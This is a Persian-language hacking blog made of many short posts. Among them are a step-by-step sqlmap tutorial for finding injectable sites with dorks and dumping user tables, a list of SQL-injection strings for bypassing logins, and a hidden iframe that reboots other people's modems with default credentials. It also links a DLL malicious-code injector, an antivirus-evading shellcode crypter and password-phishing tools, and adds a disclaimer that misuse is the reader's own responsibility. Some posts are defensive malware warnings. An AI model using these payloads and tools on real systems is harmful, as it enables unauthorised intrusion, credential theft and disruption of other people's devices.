خرید بک لینک
استاندارد اجرای تست نفوذ (PTES)، استانداردی است که در برگیرنده ی همه چیز جهت انجام تست نفوذ هست از ارتباطات اولیه و دلایل انجام تست نفوذ برای یک سازمان تا جمع آوری اطلاعات، مدل سازی تهدیدات، آنالیز آسیب پذیری، اکسپلویتیشن، پست-اکسپلویتیشن و گزارش دهی بوده و از هفت بخش اصلی تشکیل میشه: Pre-engagement Interactions Intelligence Gathering Threat Modeling Vulnerability Analysis Exploitation Post Exploitation Reporting [جهت بیشتر دیدن جزییات و مطالعه کامل به سایت زیر بروید] http://www.pentest-standard.org

برچسب: نویسنده: سپیده نیکنام تاريخ: چهارشنبه 29 آذر 1396 ساعت: 22:19

ابزار تزریق کد مخریب dll

ابزاری برای تزریق کد مخرب به فایل های dll

جهت دریافت ابزار کلیک کنید

رمز فایل : hijack.blog.ir

برچسب: نویسنده: سپیده نیکنام تاريخ: چهارشنبه 29 آذر 1396 ساعت: 22:19

⛔️تذکر مهم؛ به پیام های در ظاهر به روز رسانی فلش پلیر اعتماد نکنید⛔️ فلش پلیر دانلود شده از لینک: http://security-alert.[Random].top⚠️ که در حین وبگردی با آن مواجه می شوید آلوده به بدافزار می باشد. چند نمونه از آدرس های آلوده در زیر نمایش داده شده است. ⚠️http://security-alert[dot]w3vqxza5[dot]top/ccleaner/.... ⚠️http://security-alert[dot]3dosyv5z[dot]top/ccleaner/.... ⚠️http://security-alert[dot]q9y6np[dot]top/ccleaner/..... [ لطفا این خبر را اطلاع رسانی کنید ] توصیه می شود : در صورت دریافت چنین پیام هایی حتما به وب سایت ادوبی مراجعه کنید و در صورتی که می خواهید فلش پلیر خود را به روز رسانی کنید از طریق سایت های معتبر دانلود اقدام نمایید ✅به پیام های ظاهر شده مبنی بر به روز رسانی فلش پلیر اعتماد نکنید و در صورتی که نرم افزار مشکوکی را دانلود کردید به هیچ عنوان آن را بر روی سیستم خود نصب نکنید. ✅از آنتی ویروس استفاده نموده و حتما بروز رسانی کنید.

برچسب: نویسنده: سپیده نیکنام تاريخ: چهارشنبه 29 آذر 1396 ساعت: 22:19

برای نمایش مطلب باید رمز عبور را وارد کنید

برچسب: نویسنده: سپیده نیکنام تاريخ: دوشنبه 27 آذر 1396 ساعت: 6:56

جهت دریافت اسکریپت کلیک کنید زبان: پایتون hijack.blog.ir :رمز فایل

برچسب: نویسنده: سپیده نیکنام تاريخ: دوشنبه 27 آذر 1396 ساعت: 6:56

apple id

پسورد Apple ID را با فیشینگ از قربانی بپرسید !

https://github.com/KrauseFx/steal.password

برچسب: نویسنده: سپیده نیکنام تاريخ: دوشنبه 27 آذر 1396 ساعت: 6:56

حمله سایبری به بانک پاسارگاد خنثی شد

مدیرعامل بانک پاسارگاد:

در پی حمله سایبری ماه های گذشته به سایت بانک با مرکز هند، چین، آمریکا و...

در سه روز تا ۲ هزار و ۳۰۰ برابر پهنای باند بانک اطلاعات جعلی ارسال شد اما توانمندی جوانان ایرانی برای دفاع، بر این جریان غلبه کرد.


برچسب: نویسنده: سپیده نیکنام تاريخ: دوشنبه 27 آذر 1396 ساعت: 6:56

دسته دیگر از تروجان ها به عنوان FTP Trojan شناخته میشوند که نحوه عملکرد این تروجان بدین شکل است که قادر است پورت 21 را یاز نموده و سیستم هدف را به گونه ای برای هکر قابل دسترس بنماید. در واقع توسط این تروجان یک FTP Server بر روی سیستم قربانی نصب می گردد و نفوذگر بدین طریق میتواند به اطلاعات حساس دست یابد و نفوذگر قادر است با پروتکل FTP و پورت 21 فایل های مهم را انتقال دهد.

برچسب: نویسنده: سپیده نیکنام تاريخ: جمعه 24 آذر 1396 ساعت: 8:14

« Link Dark Web » http://b6ci4n33iwq12mwy.onion/http://b6ci4n33iwqcpmwy.onion/http://b6kpigzhrdhibmos.onion/http://b6lmqk6ovmfhrm4a.onion/http://b6siqj6jyj5qwb5a.onion/http://b6vgsw65tfihoeq2.onion/http://b77hgnafzdsqhx2p.onion/http://b7cxf4dkdsko6ah2.onion/http://b7w2gy5fn5lenigv.onion/http://babylonxjrtdyomy.onion/http://bah37war75xzkpla.onion/http://balrqba4x57ofa6s.onion/http://bananaweiwj3r7yd.onion/http://bani26jpxcv4sbuy.onion/http://bankmyoarpabtfai.onion/http://bashkdppiyz66dln.onion/http://bazaar7h4ol6a3xu.onion/http://bazaarb6uvyap2lu.onion/http://bazapfh44syfowge.onion/http://bazard3zloiubtyd.onion/http://bazarilzvorlramx.onion/http://bbseyes36k6cowi6.onion/http://bbsqfujyiblsrygu.onion/http://bbtkmm4qvv7mzdey.onion/http://bbufcbekcsnwuazb.onion/http://bbxdfsru7lmmbj32.onion/http://bbzmlkjr7bmquokx.onion/http://bc7cxr6v3arxkffn.onion/http://bcdnxg7j4h6a7mdk.onion/http://bcoseedeu6nkzme7.onion/http://bcuo3m7lb7e6athd.onion/http://bczjr6ciiblco5ti.onion/http://bdf2wcxujkg6qqff.onion/http://bdhk3yzfoizzwtwb.onion/http://bdlbvzqddbcti37i.onion/http://bdpuqvsqmphctrcs.onion/http://be7zs57kh5nkv5kp.onion/http://bea3bhruclv46hjw.onion/http://beast7ruvpc3qjhv.onion/http://bed

برچسب: نویسنده: سپیده نیکنام تاريخ: جمعه 24 آذر 1396 ساعت: 8:14

یک Pentester (هکر اخلاقی یا Ethical Hacker) آسیب پذیری های موجود در سیستم ها، شبکه ها و برنامه های کاربردی را کشف و اکسپلویت می کند.به عبارت دیگر، به شما پول پرداخت می شود تا به صورت قانونی هک کنید. شما باید از مجموعه ای از ابزار ها استفاده کنید، تعدادی از ابزار های که وجود دارند و تعدادی ابزار که خودتان طراحی کرده اید تا حملات واقعی را شبیه سازی کنید. هدف نهایی شما آن است که امنیت یک سازمان را ارتقا دهید. بر خلاف هکرهای واقعی، شما مدت محدودی زمان دارید تا به سیستم نفوذ کنید. از شما انتظار می رود که یافته های خود را مستند کنید. تست نفوذ یکی از خسته کننده ترین شغل ها در فیلد های امنیت سایبری است. برخی از وظایف عبارتند از: ادامه مطلب

برچسب: نویسنده: سپیده نیکنام تاريخ: جمعه 24 آذر 1396 ساعت: 8:14

تصویری از مرکز عملیات امنیت ملی آمریکا (NSOC) که بخشی از آژانس امنیت ملی آمریکا (NSA) میباشد

برچسب: نویسنده: سپیده نیکنام تاريخ: جمعه 24 آذر 1396 ساعت: 8:14

اصطلاح Doxing

به انتشار اطلاعات هویتی به دست آمده راجع به یک فرد از شبکه های اجتماعی عمومی اطلاق می شود.

منبع: CEH Slides

برچسب: نویسنده: سپیده نیکنام تاريخ: جمعه 24 آذر 1396 ساعت: 8:14


یک محققامنیتی با نام ZwClose متوجه شد شرکت HP بروی ۴۶۰ مدل لپ تاپ خود ، کیلاگر از پیش نصب شده دارد.


برچسب: نویسنده: سپیده نیکنام تاريخ: چهارشنبه 22 آذر 1396 ساعت: 11:07

برخی از سرفصل ها:

  • اصول اولیه امنیت
  • تست نفوذ
  • رمزنگاری
  • و.....

ادامه مطلب

برچسب: نویسنده: سپیده نیکنام تاريخ: چهارشنبه 22 آذر 1396 ساعت: 11:07

هکرهای روسی به ۱۵ بانک آمریکایی و ۳ بانکروسی حمله کردند و ۱۰ میلیون دلار از شبکه دستگاههای خودپرداز ربودند.


برچسب: نویسنده: سپیده نیکنام تاريخ: چهارشنبه 22 آذر 1396 ساعت: 11:07

آموزش دامپ دیتابیس سایت ها با باگ Sql Injection با کمک ابذار Sqlmap در قدم اول یک سایت که دارایی باگ sql داره را پیدا کنید(میتوانید از دورک های زیر استفاده کنید) inurl:news.php?id=inurl:pages.php?id=inurl:post.php?id=inurl:events.php?id=inurl:details.php?id=inurl:blog.php?id=inurl:show.php?id= تارگتی که بنده در این آموزش استفاده میکنم http://testphp.vulnweb.com/listproducts.php?cat=1' (سپس یک ترمینال را بازکنید(با دستور زیر دیتابیس سایت را بیرون بکشید sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 —dbs سپس دیتابیس های سایت رو به ما در اخر نشون میده بعدش با دستور زیر جدول های دیتادیس مورد نظر خودمونو بدست میاریم sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D نام دیتابیس —tables مثلا ما فرض رو به این میگیریم یه تیبل به ما نشون میده و اسمش هم یوزر هستش با دستور زیر ستون های دیتابیس رو بدست میاریم sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D dbname -T users —columns فرض میکنیم که سه تا ستون زیر رو نشون میده useamepasswordemail در نهایت با دستور زیر دیتای ستون هارو بدست میاریم sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D dbname -T users -C useame password email —dump دیتابیس شما با موفقیت دامپ شد ومن الله توفیق

برچسب: دیتابیس, نویسنده: سپیده نیکنام تاريخ: دوشنبه 20 آذر 1396 ساعت: 13:54

گروه هکری OilRig

گروه هکری ایرانی APT34 که پیش از این با نام OilRig شناخته میشد، شناسایی شد.


ادامه مطلب

برچسب: نویسنده: سپیده نیکنام تاريخ: دوشنبه 20 آذر 1396 ساعت: 13:54

جهت دانلود کلیک کنید 351 KB :حجم فایل hijack.blog.ir :رمز فایل استفاده نادرست بر عهده خود شخص می باشد و نویسنده وبلاگ هیچ گونه مسولیتی ندارد

برچسب: نویسنده: سپیده نیکنام تاريخ: دوشنبه 20 آذر 1396 ساعت: 13:54

phishing-kali

جهت دریافت آموزش کلیک کنید
حجم: 17.6 مگابایت

رمز فایل: hijack.blog.ir

برچسب: نویسنده: سپیده نیکنام تاريخ: يکشنبه 19 آذر 1396 ساعت: 1:16

برای نمایش مطلب باید رمز عبور را وارد کنید

برچسب: دانشگاهی, نویسنده: سپیده نیکنام تاريخ: پنجشنبه 16 آذر 1396 ساعت: 19:07

درود خدمت شما دوستان ------------------------ برای ریست کردن مودم دیگران با یک کلیک این اسکریپت رو داخل فایلی با پسوند php بریزید و روی هاست آپلود کنید و یا درون قالب وبلاگ بزارید و با یک کلیک مودم رو ریست کنید iframe src="http://admin:[email protected]/rebootinfo.cgi" width=0 height=0> یوزر و پسورد و آی پی مودم رو باید به صورت زیر تنظیم کنید iframe src="http://user:password@ip/rebootinfo.cgi" width=0 height=0> ⚠️ استفاده نادرست بر عهده خود شخص است و نویسنده وبلاگ هیچ گونه مسولیتی ندارد ⚠️

برچسب: نویسنده: سپیده نیکنام تاريخ: سه شنبه 14 آذر 1396 ساعت: 4:20

امنیت در فضای مجازی را جدی بگیرید هرگز وجود https دلیل بر اصل بودن یک پیج بانکینیست ⚠️1. تمامی بانک های مجاز به سامانه شاپرک متصل میشن ⚠️2. سایت پذیره رو اشتباه وارد کرده ⚠️3. اطلاعات پرداختو با متود get دریافت کرده ⚠️4.دارایی فیلتر می باشد

برچسب: نویسنده: سپیده نیکنام تاريخ: سه شنبه 14 آذر 1396 ساعت: 4:20

هکرها معمولا از نواقص و عدم رعایت نکات امنیتی توسط طراحان سایتها و برنامه نویسان جهت نفوذ به سایتها استفاده میکنند مواردی که با کمی دقت قابل پیش بینی و رفع هستند. در ادامه به برخی از مهمترین نواقص و موارد رایج در هک سایتها در سالهای اخیر اشاره شده است.

ادامه مطلب

برچسب: نویسنده: سپیده نیکنام تاريخ: شنبه 11 آذر 1396 ساعت: 5:54

google hacking

ابزار گوگل هکینگ جهت سرچ پیشرفته در گوگل

جهت دریافت ابزار کلیک کنید
حجم: 805 kb

رمز فایل: hijack.blog.ir

برچسب: نویسنده: سپیده نیکنام تاريخ: شنبه 11 آذر 1396 ساعت: 5:54

کاربران عزیز لطفا به سایت هایی که وارد می شوید به قدر کافی دقت کنید. به تازگی سایت pldn[dot]ir (سیستم وبلاگدهی ) می باشد توسط کارشناسان امنیت سایبری پادویش رصد شده است این سایت و تمام آدرس هایی که به pldn[dot]ir ختم می شوند (تعدادی از آنها در زیر نمایش داده شده) درواقع یک سایت Redirector می باشند. ⚠️ work.pldn[dot]ir ⚠️ nemikham-bebinamet98.pldn[dot]ir ⚠️ game.pldn[dot]ir ⚠️ shabakeh.pldn[dot]ir .... زمانی که شما این سایت را باز می کنید، به صورت تصادفی به صفحات دیگری هدایت می شوید که برخی از آن صفحات آلوده بوده و با استفاده از مهندسی اجتماعی تلاش می کنند تا شما را به دانلود فایل های آلوده ترغیب کنند. این پیام را به دوستان خود اطلاع دهید

برچسب: کاربران,اینترنت, نویسنده: سپیده نیکنام تاريخ: پنجشنبه 9 آذر 1396 ساعت: 22:45

مجموعه دستوراتی که برای تزریق به صفحات لاگین در باگ sql استفاده میشود شامل موارد زیر میشود. or'1'='1'or'1'='1''or'1'='1'or'1'='1' or ' '='' or ''='admin'or''='admin" or "a"="admin" or 1=1 --admin' or 1=1 --admin' or 'a'='aadmin') or ('a'='aadmin") or ("a"="aa=1)--admin'--' or 0=0 --" or 0=0 --or 0=0 --' or 0=0 #" or 0=0 #or 0=0 #' or 'x'='x" or "x"="x') or ('x'='x' or 1=1--" or 1=1--or 1=1--' or a=a--" or "a"="a') or ('a'='a") or ("a"="ahi" or "a"="a hi" or 1=1 --hi' or 1=1 --hi' or 'a'='ahi') or ('a'='ahi") or ("a"="a که نفوذگر با قرار دادن این دستورات در صفحات لاگین یک وب سایت بدون داشتن یوزر و پسورد اقدام به Bypass به پنل مدیریتی یا کاربری میکند.

برچسب: نویسنده: سپیده نیکنام تاريخ: پنجشنبه 9 آذر 1396 ساعت: 22:45

توسط این ابزار شل کد خام خود را به فایل اجرای غیر قابل شناسایی تبدیل کنید


برچسب: نویسنده: سپیده نیکنام تاريخ: پنجشنبه 9 آذر 1396 ساعت: 22:45


فیشینگی جدید اینبار با استفاده از Dropbox

بیشتر مراقب باشید


برچسب: نویسنده: سپیده نیکنام تاريخ: پنجشنبه 9 آذر 1396 ساعت: 22:45

در تصویر زیر کارکترهای که برای شناسایی باگ ها استفاده می شود همراه با توضیح قرار گرفته است



برچسب: کارکترهایی,شناسایی, نویسنده: سپیده نیکنام تاريخ: پنجشنبه 9 آذر 1396 ساعت: 22:45

برچسب: اسکریپت, نویسنده: سپیده نیکنام تاريخ: پنجشنبه 9 آذر 1396 ساعت: 22:45

صفحه بندی